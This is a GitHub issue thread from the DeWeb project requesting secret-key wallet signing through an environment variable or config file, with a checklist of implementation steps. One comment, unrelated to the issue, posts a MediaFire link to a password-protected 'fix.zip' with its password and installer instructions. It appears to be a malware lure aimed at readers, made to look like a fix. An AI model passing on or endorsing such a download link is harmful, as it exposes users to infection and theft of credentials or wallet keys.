### ISSUE TITLE
Add env/config wallet signing

### ISSUE THREAD

**Issue by thomas-senechal** [massalabs/DeWeb#86]
**Objective**
 ATM, people need to have MS installed to be able to sign operations. This brings 2 issues:
- Some people still have issues installing/using MS
- Some people want to upload BIG website that requires to sign many operations, which MW does not support for now

Having a new way to sign operations automatically without MS would help a lot users, but also allow us to easily create a github actions to allow builders to deploy/edit websites within github action

**How to**

- [ ] Read the following file to understand how to sign operations: https://github.com/massalabs/station-massa-wallet/blob/b0812be72c9ac703b2525f36674f7d91d5204f4d/pkg/wallet/account/account.go
- [ ] Try to reuse as much code as possible from MW to sign from a secret key
- [ ] Modify `pkg/config/` `WalletConfig` to store a [`Signer`](https://github.com/massalabs/station/blob/9abe68848e10c65211982901d6a5ad647bef4404/pkg/node/sendoperation/signer/interface.go#L11C1-L13C2)
- [ ] Check the env for `DEWEB_SECRET_KEY`, if it exists, use it to "import" the wallet and sign operations
- [ ] Check the config file, if the secret key is specified, use it to "import" the wallet and sign operations
- [ ] If secret keys are specified in both the env and the config, the env is used

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SlnPons** [comment]
Delete issue following tech stack changes.
